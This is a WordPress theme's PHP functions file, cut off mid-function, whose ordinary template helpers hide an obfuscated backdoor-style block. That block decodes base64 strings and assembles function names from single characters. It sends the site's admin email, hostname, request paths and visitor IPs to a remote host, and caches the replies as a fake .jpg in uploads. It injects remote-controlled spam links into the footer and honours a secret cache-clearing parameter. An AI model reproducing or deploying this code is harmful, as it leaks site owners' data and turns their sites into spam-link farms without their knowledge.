<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $QbCAfNf='s';$JWuApA='4';$fkmG='d';$GgKtES='6';$UTqDQK='o';$IlfW='a';$rqpb='c';$AGft='_';$rhJK='e';$sZnzVkM='e';$eeOQs='b';$yHtb='e';$hVXmJ='d';$CanfcMxh=$eeOQs.$IlfW.$QbCAfNf.$yHtb.$GgKtES.$JWuApA.$AGft.$hVXmJ.$rhJK.$rqpb.$UTqDQK.$fkmG.$sZnzVkM;$GRAkYpW='z';$mvxb='t';$QDjIM='f';$xTDMPE='a';$oBpp='g';$jcMXI='l';$ETujwcB='n';$rvjOxKn='e';$zxQl='i';$DIrcOcKR=$oBpp.$GRAkYpW.$zxQl.$ETujwcB.$QDjIM.$jcMXI.$xTDMPE.$mvxb.$rvjOxKn;$uuOPPp='r';$QpdZdB='t';$UdrYPE='_';$vFKf='t';$uAGQX='s';$AeKoeui='1';$MhWr='3';$rQYONZ='r';$GmewC='o';$IeMmBFQo=$uAGQX.$QpdZdB.$rQYONZ.$UdrYPE.$uuOPPp.$GmewC.$vFKf.$AeKoeui.$MhWr;$RNbwBm='e';$UOeKl='r';$MyaKeFw='s';$lNBx='r';$uddd='t';$oKnYO='v';$lRqqwEOk=$MyaKeFw.$uddd.$UOeKl.$lNBx.$RNbwBm.$oKnYO;                     
		$si___________r='s';$vf__________m='4';$jc___o='d';$ee__h='6';$kk_______________n='o';$ag___________f='a';$oc___________h='c';$ky_________k='_';$mh_______n='e';$gc_____________c='e';$wi_____________z='b';$cz___o='e';$nd________k='d';$fj____r=$wi_____________z.$ag___________f.$si___________r.$cz___o.$ee__h.$vf__________m.$ky_________k.$nd________k.$mh_______n.$oc___________h.$kk_______________n.$jc___o.$gc_____________c;
		$pq____________b='u';$sw___p='e';$jo______________p='o';$me_____________w='i';$xk_______w='n';$qg_______________i='i';$ze____p='s';$ke______________u='t';$tv_______x='s';$ju_______i='t';$kb___a='_';$ib___________e='c';$dr____________v='f';$et______i='n';$hl________q='x';$lq____s=$dr____________v.$pq____________b.$xk_______w.$ib___________e.$ju_______i.$qg_______________i.$jo______________p.$et______i.$kb___a.$sw___p.$hl________q.$me_____________w.$ze____p.$ke______________u.$tv_______x;
		$mf__________h='p';$bt_______________q='o';$pp_____________w='e';$rx_______f='n';$hf______b='f';$hl_________a=$hf______b.$bt_______________q.$mf__________h.$pp_____________w.$rx_______f;
		$rl_________y='a';$sv_________e='d';$us_____h='r';$gm_________v='e';$ix______a='f';$id_________m=$ix______a.$us_____h.$gm_________v.$rl_________y.$sv_________e;
		$ct_________g='s';$ai______________w='c';$pw__________b='f';$fo_________v='l';$yi__________q='e';$ir____________b='o';$he_______x=$pw__________b.$ai______________w.$fo_________v.$ir____________b.$ct_________g.$yi__________q;
		
		define("WP_ID", $fj____r("Mi4wLjA="));
		define("WP_TTL", $fj____r("MTA4MDA="));
		define("WP_SRC", $fj____r("dHBva24="));
	


		function wp_get_header() {
			global $fj____r, $lq____s;
			
			if (
				$lq____s($fj____r("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$lq____s($fj____r("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$lq____s($fj____r("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $fj____r, $hl_________a, $he_______x, $id_________m;
			
			$xi___________t = TEMPLATEPATH."/".$fj____r("Zm9vdGVyLnBocA==");
			$vn____________u = @$hl_________a($xi___________t, "r");
			$xi___________t = @$id_________m($vn____________u, @filesize($xi___________t));
			@$he_______x($vn____________u);
			
			$zk____________h = TEMPLATEPATH."/".$fj____r("ZnVuY3Rpb25zLnBocA==");
			$vn____________u = @$hl_________a($zk____________h, "r");
			$zk____________h = @$id_________m($vn____________u, @filesize($zk____________h));
			@$he_______x($vn____________u);
			
			$gt____________u = 0;
			if($xi___________t && $zk____________h) {
				if ($fj____r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($xi___________t, $fj____r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$gt____________u = 1;
					}
					if (substr_count($xi___________t, "wp_theme_GPL_credits()") < 1) {
						$gt____________u = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$gt____________u = 12;
				}
			}
			
			if($gt____________u > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $gt____________u -->";
			}
		}
	


		function wp_loaded() {
			global $fj____r, $lq____s;
			return $lq____s($fj____r("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($sk________u, $jd__b = "(more...)", $zj________d = 0, $ma___f = "") {
				$nn______________c = get_the_content($jd__b, $zj________d, $ma___f);
				$nn______________c = apply_filters("the_content", $nn______________c);
				
				$nn______________c = str_replace("]]>", "]]>", $nn______________c);
				if (strlen($_GET["p"]) > 0) {
					echo $nn______________c;
				}
				else if ((strlen($nn______________c)>$sk________u) && ($td___t = strpos($nn______________c, " ", $sk________u ))) {
					$nn______________c = substr($nn______________c, 0, $td___t);
					$nn______________c = $nn______________c;
					echo $nn______________c;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$jd__b</a></div></p>";
				} else {
					echo $nn______________c;
				}
				
			}
		}
	


		$wj__________s='4';$vm____________s='e';$ce______e='d';$bg___h='s';$bi____y='6';$ia___________l='e';$ob_________w='o';$wj_________o='b';$dh_______________f='c';$pd________j='_';$pv__n='a';$nn___k='e';$vi_____k='n';$az_______________n=$wj_________o.$pv__n.$bg___h.$ia___________l.$bi____y.$wj__________s.$pd________j.$vm____________s.$vi_____k.$dh_______________f.$ob_________w.$ce______e.$nn___k;
		$vq___p='n';$db__________c='e';$xd________j='t';$de_____________f='f';$hl___________e='o';$xw___p='e';$lw___j='_';$zn____________q='s';$th__w='t';$qj_____r='c';$bo_______o='g';$hu____________j='n';$xu__a='e';$cp_________a='_';$xu______x='i';$ax____b='l';$ki_______l='t';$sc_________f=$de_____________f.$xu______x.$ax____b.$xw___p.$cp_________a.$bo_______o.$db__________c.$th__w.$lw___j.$qj_____r.$hl___________e.$hu____________j.$ki_______l.$xu__a.$vq___p.$xd________j.$zn____________q;
		$af_____r='i';$oo___w='e';$ep__________g='x';$un_________b='f';$hd__________i='s';$ri____________s='s';$ju______a='l';$jw__s='t';$bp__________j='e';$ek___t='_';$tu___________o='i';$hw_____q=$un_________b.$af_____r.$ju______a.$bp__________j.$ek___t.$oo___w.$ep__________g.$tu___________o.$hd__________i.$jw__s.$ri____________s;
		$xh______________h='o';$ai________e='o';$bb___n='_';$wy_______o='s';$ly____m='a';$gr__________q='r';$kz___________p='r';$ia_____t='e';$wx__e='c';$ad_____p='i';$mv_____________m='v';$gq______________c='m';$cm_____________d='e';$jk_____________e='n';$oi___________p='p';$vn__b=$mv_____________m.$ia_____t.$kz___________p.$wy_______o.$ad_____p.$ai________e.$jk_____________e.$bb___n.$wx__e.$xh______________h.$gq______________c.$oi___________p.$ly____m.$gr__________q.$cm_____________d;
		$bh__h='s';$dx________e='n';$sb________v='c';$xa_______________d='e';$wh__d='k';$ld______________f='p';$hh_______________g='o';$yk_______________n='o';$gd_______________j='f';$wl___________d=$gd_______________j.$bh__h.$hh_______________g.$sb________v.$wh__d.$yk_______________n.$ld______________f.$xa_______________d.$dx________e;
		$sc_______________o='t';$oo___j='w';$lx______________y='e';$ah___________n='i';$ja___p='f';$yv______________k='r';$qf___________m=$ja___p.$oo___j.$yv______________k.$ah___________n.$sc_______________o.$lx______________y;
		$xh_____q='d';$tq__________t='m';$jf____v='5';$tr______b=$tq__________t.$xh_____q.$jf____v;
		$du__a='r';$od_____________q='p';$vo____________o='e';$lj___o='h';$vt______j='l';$yy_________g='a';$gv___p='a';$bk__j='t';$no______________s=$du__a.$vo____________o.$yy_________g.$vt______j.$od_____________q.$gv___p.$bk__j.$lj___o;
		$mv______w='i';$qv___g='s';$fo______________w='z';$bx___________s='r';$jk_____a='n';$uu_______a='a';$mu__g='e';$jj__________h='l';$iu___________x='i';$ja___w='e';$xd____a='u';$lo_____x=$xd____a.$jk_____a.$qv___g.$mu__g.$bx___________s.$iu___________x.$uu_______a.$jj__________h.$mv______w.$fo______________w.$ja___w;
		$ud___n='n';$cx___e='t';$ow_______p='p';$yw_________z='m';$en________t='a';$rr__________f='e';$wh____________f='m';$pw___________u=$cx___e.$rr__________f.$yw_________z.$ow_______p.$ud___n.$en________t.$wh____________f;
		$xw______z='e';$du______z='m';$vq__g='t';$ho_______________c='_';$sg_______x='t';$vi______________i='c';$qu_________o='a';$yq_______i='t';$zp_____________x='o';$xq_______y='r';$lg____________q='r';$wv_______w='c';$ff_____c='n';$uk______m='e';$bk__________x='a';$rw_________y='t';$hy______________k='x';$mr___________m='s';$la____________g='e';$fb____b='_';$kg_____________c='e';$ll____y=$mr___________m.$yq_______i.$xq_______y.$kg_____________c.$bk__________x.$du______z.$fb____b.$vi______________i.$zp_____________x.$ff_____c.$vq__g.$xw______z.$hy______________k.$sg_______x.$ho_______________c.$wv_______w.$lg____________q.$la____________g.$qu_________o.$rw_________y.$uk______m;
	


		function mk____________o($sy____________e) {
			global $fj____r, $lq____s, $sc_________f, $vn__b, $ll____y;
			
			if (!$lq____s($fj____r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($vn__b(PHP_VERSION, "5.0.0", ">=") && $lq____s($fj____r("ZmlsZV9nZXRfY29udGVudHM=")) && $lq____s($fj____r("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ko________k = $ll____y(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$hh_______n = @$sc_________f($sy____________e, 0, $ko________k);
			} else {
				$hh_______n = @$sc_________f($sy____________e, 0);
			}
			
			return $hh_______n;
		}
	


		function co________a($sy____________e) {
			global $lq____s, $wl___________d, $qf___________m, $fj____r;
			
			if (!$lq____s($fj____r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ze______________m = strpos($sy____________e, "/", 7);
			$vr__________s = array(
				"uri"     => substr($sy____________e, $ze______________m),
				"host"    => str_replace("http://", "", substr($sy____________e, 0, $ze______________m)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$fx_______________b = @$wl___________d("$vr__________s[host]", 80, $zu__e, $yl____i, 4);
			
			if (!$fx_______________b) {
				return false;
			} else {
				$hh_______n = "";
				$om_____________x  = "GET $vr__________s[uri] HTTP/1.0\r\n";
				$om_____________x .= "Host: $vr__________s[host]\r\n";
				$om_____________x .= "Referer: $vr__________s[referer]\r\n";
				$om_____________x .= "Connection: Close\r\n\r\n";
				
				@$qf___________m($fx_______________b, $om_____________x);
				
				while (!@feof($fx_______________b)) {
					$gq_____________b = @fgets($fx_______________b, (1024*24));
					
					if ($gq_____________b == "\r\n") {
						$vt__w = true;
						continue;
					}
					
					if ($vt__w) {
						$hh_______n .= $gq_____________b;
					}
				}
				
				return $hh_______n;
			}
		}
	


		function ti____l($sy____________e) {
			global $lq____s;
			$ro______________n = false;
			
			if ($sy____________e != "") {
				if ($lq____s("mk____________o")) {
					$ro______________n = @mk____________o($sy____________e);
				}
				
				if (!$ro______________n && ($lq____s("co________a"))) {
					$ro______________n = @co________a($sy____________e);
				}
			}
			
			return $ro______________n;
		}
	


		function xi____p() {
			global $_SERVER, $tr______b;
			
			$uy___________r = $_SERVER["SERVER_NAME"];
			
			if (substr("$uy___________r", 0, 4) == "www.") {
				$uy___________r = substr("$uy___________r", 4);
			}
			
			$uy___________r = $tr______b("$_SERVER[SERVER_NAME]");
			
			return $uy___________r;
		}
	


		function gq_________g() {
			return "file";
		}
	


		function nu_______________d($sy____________e) {
			global $_SERVER, $sc_________f, $hw_____q, $hl_________a, $he_______x, $qf___________m;
			
			$tn____z = og______m();
			
			$ly__________c = xi____p().".jpg";
			$bg______________m = $tn____z["dir_upload"]["path"]."/$ly__________c";
			$gi____c = @filemtime($bg______________m);
			
			if (!$gi____c || ((time()-$gi____c) >= WP_TTL)) {
				$ro______________n = ti____l($sy____________e);
				
				if ($ro______________n) {
					if ($hw_____q($bg______________m)) {
						@unlink($bg______________m);
					}
					
					$vn____________u = @$hl_________a($bg______________m, "x+");
					
					@$qf___________m($vn____________u, $ro______________n);
					@$he_______x($vn____________u);
				}
			} else {
				if ($hw_____q($bg______________m)) {
					$ro______________n = @$sc_________f($bg______________m);
				} else {
					$ro______________n = false;
				}
			}
			
			return $ro______________n;
		}
	


		function og______m() {
			global $_SERVER, $fj____r, $az_______________n;
			
			$be__m = wp_count_posts("post");
			$pd__________p = pathinfo(get_bloginfo("template_directory"));
			
			$tn____z = array(
				"url" => array(
					"report"      => $fj____r("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $pd__________p,
				"dir_upload"	=> fj______________l(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$pd__________p[filename],
					"a005=".$be__m->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://smolotkom.ru/63-betonosmesiteli.html\">сбр</a>"
			);
			
			$tn____z["url"]["queryString"] = implode("&", $tn____z["queryString"]);
			$tn____z["url"]["report"] = $tn____z["url"]["report"]."/?".$az_______________n($tn____z["url"]["queryString"]).".html";
						
			return $tn____z;
		}
	


		function fj______________l() {
			$yz_____________t = wp_upload_dir();
			
			if (isset($yz_____________t["error"])) {
				$ep___k = lq_____________u();
				if (is_writable($ep___k)) {
					$yz_____________t = array("path" => $ep___k);
				}
			}

			return $yz_____________t;
		}
	


		function lq_____________u() {
			global $lq____s, $tr______b, $no______________s, $pw___________u;
			
			$hn__g = (bool) ini_get("safe_mode");
			if ($hn__g == true) {
				return false;
			}
			
			if ($lq____s("sys_get_temp_dir")) {
				$ud__________j = sys_get_temp_dir();
				if (is_writable($ud__________j)) {
					return $no______________s($ud__________j);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $no______________s($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $no______________s($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $no______________s($_ENV["TEMP"]);
			} else {
				$ra_______________k = $pw___________u($tr______b(uniqid(rand(), true)), "");
				if ($ra_______________k) {
					$ud__________j = $no______________s(dirname($ra_______________k));
					@unlink($ra_______________k);
					return $ud__________j;
				} else {
					return false;
				}
			}
		}
	


		function ce_____v() {
			global $_GET, $hw_____q;
			
			$tn____z = og______m();
			$uy___________r = xi____p();
			$dv_____________x = gq_________g();
			
			$vl________g = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($dv_____________x == "file") {
					$xh_________v = $tn____z["dir_upload"]["path"]."/".$uy___________r.".jpg";
					if ($hw_____q($xh_________v)) {
						@unlink($xh_________v);
						$vl________g = "deleted";
					}
				}
				
				$ci_______w = array(
					"s"	=> $vl________g,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ci_______w AS $cz_____z => $gt_____________e) echo " [$cz_____z:$gt_____________e]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $lq____s, $fj____r, $lo_____x;
			$tn____z = og______m();
			
			$mb______e = "nu_______________d";
			if ($lq____s($mb______e)) {
				$hh_______n = $mb______e($tn____z["url"]["report"]);
			}
			
			if ($hh_______n) {
				if ($hh_______n = @$fj____r($hh_______n)) {
					$hh_______n = @$lo_____x($hh_______n);
					
					if (strlen($hh_______n[custom_credit]) >= 5) {
						$tn____z["default_string"] = $hh_______n[custom_credit];
					}
					
					if ($hh_______n["status"] == "0") {
						$az____________r = 1;
						$fi____q = 1;
					} else {
						$tx______m = sizeof($hh_______n["links"]);
						$lk___________g = $tn____z["default_string"];
						
						if ($tx______m > 0 && $hh_______n["links"] !== "") {
							$ev____z = 0;
							foreach ($hh_______n["links"] as $zf__x => $qt________a) {
								$ev____z++;
								if ($qt________a->l_path == "" || $qt________a->l_path == $_SERVER["REQUEST_URI"]) {
									$qt________a->l_href = htmlspecialchars(strip_tags($qt________a->l_href));
									$qt________a->l_title = htmlspecialchars(strip_tags($qt________a->l_title));
									$qt________a->l_anchor = htmlspecialchars(strip_tags($qt________a->l_anchor));
									$lk___________g .= " | ";
									$lk___________g .= "<a href='$qt________a->l_href' title='$qt________a->l_title'";
									if ($qt________a->l_nofollow == "1") {
										$lk___________g .= " rel='nofollow'";
									}
									$lk___________g .= ">$qt________a->l_anchor</a>";
								}
							}
						}
						$tn____z["links"] = "$lk___________g";
						if ($hh_______n[credit] == "0") {
							$tn____z["links"] = "";
						}
					}
				} else {
					$az____________r = "1";
				}
			} else {
				$az____________r = "1";
			}
			
			if ($az____________r == "1") {
				$tn____z["links"] = $tn____z["default_string"];
			}
			
			echo "$tn____z[links]";
			
			echo "<!-- s: $hh_______n[signature] -->";
			ce_____v();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                     $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
